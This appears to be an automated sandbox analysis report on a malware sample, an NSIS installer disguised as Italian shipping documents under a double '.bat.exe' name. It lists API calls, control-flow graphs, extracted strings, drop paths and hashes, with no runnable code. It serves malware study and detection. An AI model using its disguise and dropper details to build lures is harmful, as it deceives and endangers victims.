                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Premolder\Mokl$C:\Users\user\AppData\Roaming\Premolder\Mokl$C:\Users\user\Desktop$C:\Users\user\Desktop\Documenti di spedizione.bat.exe$Civilisere Setup$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                  • API String ID: 1813718867-2907415070
                                                  • Opcode ID: 3b0ca163a138ceeb4dc0e43934e69722792c29fddf94c25b6d98525d7c12ca17
                                                  • Instruction ID: 48c25345ab5c6186891d52a8fabce3a967a0262862fdddf466c19d710b4311b7
                                                  • Opcode Fuzzy Hash: 3b0ca163a138ceeb4dc0e43934e69722792c29fddf94c25b6d98525d7c12ca17
                                                  • Instruction Fuzzy Hash: EDF1E571604301AAD720AF659D05B2B7EE8EB8570AF10483EF581B22D1DB7CDA45CB6E
                                                  APIs
                                                    • Part of subcall function 73D812BB: GlobalAlloc.KERNELBASE(00000040,?,73D812DB,?,73D8137F,00000019,73D811CA,-000000A0), ref: 73D812C5
                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73D81D2D
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 73D81D75
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 73D81D7F
                                                  • GlobalFree.KERNEL32(00000000), ref: 73D81D92
                                                  • GlobalFree.KERNEL32(?), ref: 73D81E74
                                                  • GlobalFree.KERNEL32(?), ref: 73D81E79
                                                  • GlobalFree.KERNEL32(?), ref: 73D81E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 73D82068
                                                  • lstrcpyW.KERNEL32(?,?), ref: 73D82222
                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 73D822A1
                                                  • LoadLibraryW.KERNEL32(00000008), ref: 73D822B2
                                                  • GetProcAddress.KERNEL32(?,?), ref: 73D8230C
                                                  • lstrlenW.KERNEL32(00000808), ref: 73D82326
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: a3115bd729f1b1b5ddf28f244c527a94e6be852497f3b7de37059791b222774a
                                                  • Instruction ID: 65c1fcccab8ab2135d17f5650381745d22987bd46334975da12be2215ef89521
                                                  • Opcode Fuzzy Hash: a3115bd729f1b1b5ddf28f244c527a94e6be852497f3b7de37059791b222774a
                                                  • Instruction Fuzzy Hash: 10227972D0420ADFDB128FA4C5847EEB7B5FB04725F24452ED1A6F6280E774B689CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 519 405dae-405dd4 call 406079 522 405dd6-405de8 DeleteFileW 519->522 523 405ded-405df4 519->523 524 405f6a-405f6e 522->524 525 405df6-405df8 523->525 526 405e07-405e17 call 4066a2 523->526 527 405f18-405f1d 525->527 528 405dfe-405e01 525->528 532 405e26-405e27 call 405fbd 526->532 533 405e19-405e24 lstrcatW 526->533 527->524 531 405f1f-405f22 527->531 528->526 528->527 534 405f24-405f2a 531->534 535 405f2c-405f34 call 4069ff 531->535 536 405e2c-405e30 532->536 533->536 534->524 535->524 542 405f36-405f4a call 405f71 call 405d66 535->542 539 405e32-405e3a 536->539 540 405e3c-405e42 lstrcatW 536->540 539->540 543 405e47-405e63 lstrlenW FindFirstFileW 539->543 540->543 559 405f62-405f65 call 405727 542->559 560 405f4c-405f4f 542->560 545 405e69-405e71 543->545 546 405f0d-405f11 543->546 547 405e91-405ea5 call 4066a2 545->547 548 405e73-405e7b 545->548 546->527 550 405f13 546->550 561 405ea7-405eaf 547->561 562 405ebc-405ec7 call 405d66 547->562 551 405ef0-405f00 FindNextFileW 548->551 552 405e7d-405e85 548->552 550->527 551->545 558 405f06-405f07 FindClose 551->558 552->547 555 405e87-405e8f 552->555 555->547 555->551 558->546 559->524 560->534 563 405f51-405f60 call 405727 call 406462 560->563 561->551 564 405eb1-405eba call 405dae 561->564 572 405ee8-405eeb call 405727 562->572 573 405ec9-405ecc 562->573 563->524 564->551 572->551 576 405ee0-405ee6 573->576 577 405ece-405ede call 405727 call 406462 573->577 576->551 577->551
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 00405DD7
                                                  • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 00405E1F
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 00405E42
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 00405E48
                                                  • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,76233420,76232EE0,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"), ref: 00405E58
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                  • FindClose.KERNEL32(00000000), ref: 00405F07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$POB$\*.*
                                                  • API String ID: 2035342205-3982043610
                                                  • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                  • Instruction ID: 08bfc2840413863968cf962241dff1eb28b75ffaef7a08e493f25e9a85e6eaf1
                                                  • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                  • Instruction Fuzzy Hash: E341F130800A06A6CB21AB61CD89BBF7278EF45754F14413FF485B11C1DB7C4A82DEAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 885 406dc0-406dc5 886 406e36-406e54 885->886 887 406dc7-406df6 885->887 888 40742c-407441 886->888 889 406df8-406dfb 887->889 890 406dfd-406e01 887->890 894 407443-407459 888->894 895 40745b-407471 888->895 891 406e0d-406e10 889->891 892 406e03-406e07 890->892 893 406e09 890->893 896 406e12-406e1b 891->896 897 406e2e-406e31 891->897 892->891 893->891 898 407474-40747b 894->898 895->898 899 406e20-406e2c 896->899 900 406e1d 896->900 903 407003-407021 897->903 901 4074a2-4074ae 898->901 902 40747d-407481 898->902 906 406e96-406ec4 899->906 900->899 910 406c44-406c4d 901->910 904 407630-40763a 902->904 905 407487-40749f 902->905 908 407023-407037 903->908 909 407039-40704b 903->909 913 407646-407659 904->913 905->901 911 406ee0-406efa 906->911 912 406ec6-406ede 906->912 914 40704e-407058 908->914 909->914 917 406c53 910->917 918 40765b 910->918 919 406efd-406f07 911->919 912->919 920 40765e-407662 913->920 915 40705a 914->915 916 406ffb-407001 914->916 921 406fd6-406fda 915->921 922 40716b-407178 915->922 916->903 927 406f9f-406fa9 916->927 923 406c5a-406c5e 917->923 924 406d9a-406dbb 917->924 925 406cff-406d03 917->925 926 406d6f-406d73 917->926 918->920 928 406f0d 919->928 929 406e7e-406e84 919->929 940 406fe0-406ff8 921->940 941 4075e2-4075ec 921->941 922->910 933 4071c7-4071d6 922->933 923->913 932 406c64-406c71 923->932 924->888 930 406d09-406d22 925->930 931 4075af-4075b9 925->931 934 406d79-406d8d 926->934 935 4075be-4075c8 926->935 936 4075ee-4075f8 927->936 937 406faf-406fd1 927->937 943 406e63-406e7b 928->943 944 4075ca-4075d4 928->944 938 406f37-406f3d 929->938 939 406e8a-406e90 929->939 947 406d25-406d29 930->947 931->913 932->918 945 406c77-406cbd 932->945 933->888 949 406d90-406d98 934->949 935->913 936->913 937->922 946 406f9b 938->946 948 406f3f-406f5d 938->948 939->906 939->946 940->916 941->913 943->929 944->913 953 406ce5-406ce7 945->953 954 406cbf-406cc3 945->954 946->927 947->925 950 406d2b-406d31 947->950 951 406f75-406f87 948->951 952 406f5f-406f73 948->952 949->924 949->926 959 406d33-406d3a 950->959 960 406d5b-406d6d 950->960 961 406f8a-406f94 951->961 952->961 957 406cf5-406cfd 953->957 958 406ce9-406cf3 953->958 955 406cc5-406cc8 GlobalFree 954->955 956 406cce-406cdc GlobalAlloc 954->956 955->956 956->918 965 406ce2 956->965 957->947 958->957 958->958 962 406d45-406d55 GlobalAlloc 959->962 963 406d3c-406d3f GlobalFree 959->963 960->949 961->938 964 406f96 961->964 962->918 962->960 963->962 967 4075d6-4075e0 964->967 968 406f1c-406f34 964->968 965->953 967->913 968->938
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                  • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                  • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                  • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1005 4069ff-406a13 FindFirstFileW 1006 406a20 1005->1006 1007 406a15-406a1e FindClose 1005->1007 1008 406a22-406a23 1006->1008 1007->1008
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00425F98,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,004060C2,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nso28B6.tmp,C:\Users\user\AppData\Local\Temp\nso28B6.tmp, 4#v.#v,?,76232EE0,00405DCE,?,76233420,76232EE0), ref: 00406A0A
                                                  • FindClose.KERNEL32(00000000), ref: 00406A16
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nso28B6.tmp, xrefs: 004069FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nso28B6.tmp
                                                  • API String ID: 2295610775-3993855157
                                                  • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                  • Instruction ID: 20279147522b4af1e9b85c80e58242a12c3cc79f3f19e9bc8d226ca4cfbd33e3
                                                  • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                  • Instruction Fuzzy Hash: 9FD012317595205BC640673C6E0C89B7E589F1A3317128A36F06BF21E4D7348C628A9C
                                                  APIs
                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Premolder\Mokl, xrefs: 0040228E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\Premolder\Mokl
                                                  • API String ID: 542301482-3631966918
                                                  • Opcode ID: 0140e218fa6805cd9e9d549b3f46d2fa505c0e185024ac1d7b568c254fc15d58
                                                  • Instruction ID: 6ff6f317fb38c44f87062c5feee8d19efe767a13196ba6052caed3a8697b1732
                                                  • Opcode Fuzzy Hash: 0140e218fa6805cd9e9d549b3f46d2fa505c0e185024ac1d7b568c254fc15d58
                                                  • Instruction Fuzzy Hash: 57410575A00209AFCB00DFE4CA89A9D7BB5FF48318B20457EF505EB2D1DB799981CB54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 151 403d74-403d8c call 406a96 154 403da0-403dd7 call 406570 151->154 155 403d8e-403d9e call 4065e9 151->155 160 403dd9-403dea call 406570 154->160 161 403def-403df5 lstrcatW 154->161 164 403dfa-403e23 call 40404a call 406079 155->164 160->161 161->164 169 403eb5-403ebd call 406079 164->169 170 403e29-403e2e 164->170 176 403ecb-403ef0 LoadImageW 169->176 177 403ebf-403ec6 call 4066df 169->177 170->169 171 403e34-403e5c call 406570 170->171 171->169 178 403e5e-403e62 171->178 180 403f71-403f79 call 40140b 176->180 181 403ef2-403f22 RegisterClassW 176->181 177->176 182 403e74-403e80 lstrlenW 178->182 183 403e64-403e71 call 405f9e 178->183 194 403f83-403f8e call 40404a 180->194 195 403f7b-403f7e 180->195 184 404040 181->184 185 403f28-403f6c SystemParametersInfoW CreateWindowExW 181->185 189 403e82-403e90 lstrcmpiW 182->189 190 403ea8-403eb0 call 405f71 call 4066a2 182->190 183->182 188 404042-404049 184->188 185->180 189->190 193 403e92-403e9c GetFileAttributesW 189->193 190->169 198 403ea2-403ea3 call 405fbd 193->198 199 403e9e-403ea0 193->199 204 403f94-403fae ShowWindow call 406a26 194->204 205 404017-40401f call 4057fa 194->205 195->188 198->190 199->190 199->198 212 403fb0-403fb5 call 406a26 204->212 213 403fba-403fcc GetClassInfoW 204->213 210 404021-404027 205->210 211 404039-40403b call 40140b 205->211 210->195 214 40402d-404034 call 40140b 210->214 211->184 212->213 217 403fe4-404015 DialogBoxParamW call 40140b call 403cc4 213->217 218 403fce-403fde GetClassInfoW RegisterClassW 213->218 214->195 217->188 218->217
                                                  APIs
                                                    • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                    • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                  • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",00008001), ref: 00403DF5
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Premolder\Mokl,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,76233420), ref: 00403E75
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Premolder\Mokl,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E88
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403E93
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Premolder\Mokl), ref: 00403EDC
                                                    • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                  • RegisterClassW.USER32(00428A00), ref: 00403F19
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FC8
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FD5
                                                  • RegisterClassW.USER32(00428A00), ref: 00403FDE
                                                  • DialogBoxParamW.USER32(?,00000000,00404122,00000000), ref: 00403FFD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Premolder\Mokl$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-2623925806
                                                  • Opcode ID: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                  • Instruction ID: c4c704bd5297fd73affe36db923882850e9d0fe41f98d1713f1e709c6875f219
                                                  • Opcode Fuzzy Hash: 88ce8c9e08653c8c77508e3d04e35fbea88059d5690854b4a695da9470a7d88c
                                                  • Instruction Fuzzy Hash: E061C670240701BAD620AB66AD46F2B3A7CEB85745F41453FF941B22E2DF7D5D02CA2D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 225 4030f5-403143 GetTickCount GetModuleFileNameW call 406192 228 403145-40314a 225->228 229 40314f-40317d call 4066a2 call 405fbd call 4066a2 GetFileSize 225->229 230 40338f-403393 228->230 237 403183 229->237 238 403268-403276 call 403053 229->238 240 403188-40319f 237->240 244 403347-40334c 238->244 245 40327c-40327f 238->245 242 4031a1 240->242 243 4031a3-4031ac call 403607 240->243 242->243 250 4031b2-4031b9 243->250 251 403303-40330b call 403053 243->251 244->230 248 403281-403299 call 40361d call 403607 245->248 249 4032ab-4032f7 GlobalAlloc call 406bf1 call 4061c1 CreateFileW 245->249 248->244 272 40329f-4032a5 248->272 276 4032f9-4032fe 249->276 277 40330d-40333d call 40361d call 403396 249->277 254 403235-403239 250->254 255 4031bb-4031cf call 40614d 250->255 251->244 262 403243-403249 254->262 263 40323b-403242 call 403053 254->263 255->262 274 4031d1-4031d8 255->274 267 403258-403260 262->267 268 40324b-403255 call 406b83 262->268 263->262 267->240 275 403266 267->275 268->267 272->244 272->249 274->262 279 4031da-4031e1 274->279 275->238 276->230 286 403342-403345 277->286 279->262 281 4031e3-4031ea 279->281 281->262 283 4031ec-4031f3 281->283 283->262 285 4031f5-403215 283->285 285->244 288 40321b-40321f 285->288 286->244 287 40334e-40335f 286->287 289 403361 287->289 290 403367-40336c 287->290 291 403221-403225 288->291 292 403227-40322f 288->292 289->290 293 40336d-403373 290->293 291->275 291->292 292->262 294 403231-403233 292->294 293->293 295 403375-40338d call 40614d 293->295 294->262 295->230
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403109
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,00000400), ref: 00403125
                                                    • Part of subcall function 00406192: GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00406196
                                                    • Part of subcall function 00406192: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 0040316E
                                                  • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 004032B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$)2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Documenti di spedizione.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 2803837635-3976395956
                                                  • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                  • Instruction ID: 4d59aa34fe8aef517225e0e03f455ac639a07fb2fd098cfe03fbce1fe051b31e
                                                  • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
